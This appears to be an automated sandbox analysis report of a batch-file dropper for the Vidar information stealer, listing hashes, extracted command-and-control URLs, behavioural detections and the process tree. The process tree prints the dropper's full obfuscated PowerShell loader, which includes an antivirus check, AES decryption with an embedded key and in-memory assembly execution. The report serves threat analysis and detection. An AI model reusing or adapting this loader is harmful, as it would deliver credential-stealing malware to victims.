Analysis
-
max time kernel
17s -
max time network
24s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
12-09-2024 13:01
Static task
static1
General
-
Target
JpNzLWAgHF_MrAnon.bat
-
Size
5.3MB
-
MD5
19b5c87c0b9852349096678f5e282023
-
SHA1
4cb1080f90f68b65c8ebab9c2e7a8286640b3ac0
-
SHA256
163edbe86835ef07b9248ee9516b136be05d5b3fd60479bfa81e3375f44eacc9
-
SHA512
82d4e435057de7e938c7cee8695bc1e258b2352ae885c68f26a679c91793b16c353cc8440e706f4687c49990d3b936788acb253983c671ef09b1bb46bf90a4e4
-
SSDEEP
49152:Ik2uYNfkQHyggm5Xve+n8gJgxk5kWsqO+Cgs4e5NUZAICDucSsjHaz4Dl0vBKF:B
Malware Config
Extracted
vidar
https://t.me/edm0d
https://steamcommunity.com/profiles/
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
Signatures
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral1/memory/4992-141-0x0000000000400000-0x0000000000657000-memory.dmp family_vidar_v7 behavioral1/memory/4992-145-0x0000000000400000-0x0000000000657000-memory.dmp family_vidar_v7 behavioral1/memory/4992-147-0x0000000000400000-0x0000000000657000-memory.dmp family_vidar_v7 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4196 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4884 set thread context of 4992 4884 powershell.exe 77 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4884 powershell.exe 4884 powershell.exe 4884 powershell.exe 4196 powershell.exe 4196 powershell.exe 4196 powershell.exe 4992 RegAsm.exe 4992 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4884 powershell.exe Token: SeDebugPrivilege 4196 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4412 wrote to memory of 972 4412 cmd.exe 74 PID 4412 wrote to memory of 972 4412 cmd.exe 74 PID 4412 wrote to memory of 4884 4412 cmd.exe 75 PID 4412 wrote to memory of 4884 4412 cmd.exe 75 PID 4412 wrote to memory of 4884 4412 cmd.exe 75 PID 4884 wrote to memory of 4196 4884 powershell.exe 76 PID 4884 wrote to memory of 4196 4884 powershell.exe 76 PID 4884 wrote to memory of 4196 4884 powershell.exe 76 PID 4884 wrote to memory of 4992 4884 powershell.exe 77 PID 4884 wrote to memory of 4992 4884 powershell.exe 77 PID 4884 wrote to memory of 4992 4884 powershell.exe 77 PID 4884 wrote to memory of 4992 4884 powershell.exe 77 PID 4884 wrote to memory of 4992 4884 powershell.exe 77 PID 4884 wrote to memory of 4992 4884 powershell.exe 77 PID 4884 wrote to memory of 4992 4884 powershell.exe 77 PID 4884 wrote to memory of 4992 4884 powershell.exe 77 PID 4884 wrote to memory of 4992 4884 powershell.exe 77 PID 4884 wrote to memory of 4992 4884 powershell.exe 77
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\JpNzLWAgHF_MrAnon.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\JpNzLWAgHF_MrAnon.bat';$Fyln='SBaRNpliBaRNtBaRN'.Replace('BaRN', ''),'Invnedaonedakeneda'.Replace('neda', ''),'EboudnboudtboudryboudPboudoboudintboud'.Replace('boud', ''),'MaYSfCinMYSfCoYSfCdulYSfCeYSfC'.Replace('YSfC', ''),'LoadqVJddqVJ'.Replace('dqVJ', ''),'FgXzErgXzEogXzEmBgXzEagXzEsgXzEegXzE64SgXzEtgXzErigXzEnggXzE'.Replace('gXzE', ''),'CBCMXopBCMXyTBCMXoBCMX'.Replace('BCMX', ''),'ESmiJlSmiJeSmiJmenSmiJtAtSmiJ'.Replace('SmiJ', ''),'ChfjJLanfjJLgfjJLeExfjJLtfjJLenfjJLsifjJLonfjJL'.Replace('fjJL', ''),'GeyBtXtCyBtXuryBtXreyBtXntyBtXProyBtXceyBtXssyBtX'.Replace('yBtX', ''),'TrbTqfanbTqfsbTqfforbTqfmbTqfFinbTqfalbTqfBbTqflobTqfckbTqf'.Replace('bTqf', ''),'ReaACqRdACqRLiACqRneACqRsACqR'.Replace('ACqR', ''),'CredSdxadSdxtedSdxDedSdxcrdSdxypdSdxtdSdxordSdx'.Replace('dSdx', ''),'DCrPCeCrPCcomCrPCpreCrPCssCrPC'.Replace('CrPC', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($Fyln[9])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function NItLV($nzWJk){$DdoMy=[System.Security.Cryptography.Aes]::Create();$DdoMy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$DdoMy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$DdoMy.Key=[System.Convert]::($Fyln[5])('tRyGB5PdbiSqFo/ETUYwPoj7Pv8OlhuGCHsxSSDk/TM=');$DdoMy.IV=[System.Convert]::($Fyln[5])('zT33ctLvNUVazqPY5eMA9w==');$jTksN=$DdoMy.($Fyln[12])();$ttoWi=$jTksN.($Fyln[10])($nzWJk,0,$nzWJk.Length);$jTksN.Dispose();$DdoMy.Dispose();$ttoWi;}function EmQKv($nzWJk){$xudhB=New-Object System.IO.MemoryStream(,$nzWJk);$lXTBg=New-Object System.IO.MemoryStream;$MgRyv=New-Object System.IO.Compression.GZipStream($xudhB,[IO.Compression.CompressionMode]::($Fyln[13]));$MgRyv.($Fyln[6])($lXTBg);$MgRyv.Dispose();$xudhB.Dispose();$lXTBg.Dispose();$lXTBg.ToArray();}$pYQiu=[System.IO.File]::($Fyln[11])([Console]::Title);$mhlnF=EmQKv (NItLV ([Convert]::($Fyln[5])([System.Linq.Enumerable]::($Fyln[7])($pYQiu, 5).Substring(2))));$GMHtR=EmQKv (NItLV ([Convert]::($Fyln[5])([System.Linq.Enumerable]::($Fyln[7])($pYQiu, 6).Substring(2))));[System.Reflection.Assembly]::($Fyln[4])([byte[]]$GMHtR).($Fyln[2]).($Fyln[1])($null,$null);[System.Reflection.Assembly]::($Fyln[4])([byte[]]$mhlnF).($Fyln[2]).($Fyln[1])($null,$null); "2⤵PID:972
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4196
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4992
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59cfc7a98b758174d91a40515a37ef935
SHA1ccd0eff396f99a725c697990544c345256a36215
SHA2568385a9299312f77a2ced3780086eeeb82f9aa7ab0080d6a26235e09f066ec26e
SHA5120a11eb0d96f5669c2e2bed54bbca25395b9d1749384e452fd2e97ca4457d8d04f58d764839fcba56eb5e081844d11f455a9d1342a086c21318300ebe93987001
-
Filesize
18KB
MD57c38ddcda79080994f5af61cc6aaf505
SHA17ffbb890bbdee0e71027dbded68c0e239ee2841e
SHA256e5f1fe3b4783d3c84a8044cd39d551a32eebc136f96b56351cd492eb15e923ca
SHA51250be031f85de49c6bc4545da7f57e3897e968c9d3b2b89040347d772cb695441616906f4a52fbf30e918f4f3bc53edddd417b3241b372ecca084fd8718393f4b
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a